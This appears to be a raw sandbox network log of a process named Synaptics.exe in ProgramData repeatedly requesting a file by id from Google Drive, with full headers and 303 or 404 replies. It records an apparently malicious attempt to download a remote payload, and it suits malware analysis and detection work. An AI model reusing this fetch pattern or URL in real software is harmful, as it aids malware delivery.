                                                                                                                2024-12-30 09:58:14 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:14 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:14 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-BFhqOqHrAJJyypZIdC6Rhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                16 | 192.168.2.7 | 49739 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:14 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:14 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7dskQjPM8EtBLj7DI219i3hc14ASKktY4H4FjGGOJ5TukjBE9GnF1JC8ZQzMt0b64_IChyvrg
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:14 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-zMmt71LQvMD38aLi5pSu-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:14 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:14 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="esTmHigAMYE2DQtK3JTBfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:14 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                17 | 192.168.2.7 | 49741 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:14 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:14 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6UywZIBLsum1uqUkxN4QyXm2YELCF5fDptiFS8ZajQEybXSaKbR2D90dgXIHtEzbKA
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:14 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ZhvleVkG8FNxXc00zDN89g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:14 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:14 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="wyguF2PNcsXUqMuG7CrAHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:14 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                18 | 192.168.2.7 | 49748 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                19 | 192.168.2.7 | 49749 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                20 | 192.168.2.7 | 49750 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:15 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                21 | 192.168.2.7 | 49764 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:16 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:16 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Rrr1HGso36XsfMehI8SFQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 49763 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:16 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
2024-12-30 09:58:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:16 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-GI2JR52s6WwrNz9uyAaN6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 49773 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:17 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:17 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7zaqHxWQ2xdr4v62YA1pchjlXaICEySCb7Qg71mzdE5paMr8e6tuntIeD3tqDqJni1
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:17 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_pn05JeS1kQVyYlxCKXoow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:17 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 09:58:17 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="5mJ2ozH46ODIHUvI4r2bQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 09:58:17 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 49774 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:17 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:17 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC4p0hWHWv7KI4Ft1cdauagpWlOTLJFun9qaAYvI5GDzkFo6e0YjBJgiC43nkc5FNQCf3b1A0Jk
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:17 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-XozYoz5MesEU26y0NyLlPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:17 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 09:58:17 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="z_HgEXnsNGGzSw_KviumXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 09:58:17 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 49771 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:17 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
2024-12-30 09:58:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:17 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HPEcqOlELmPtAjlw95QXsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 49772 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:17 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
2024-12-30 09:58:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:17 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-iyed252OZri3qOevhl3dIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 49785 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:18 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:18 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ls8K-R9-rxM3vICCP4_RPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                28 | 192.168.2.7 | 49786 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:18 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:18 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
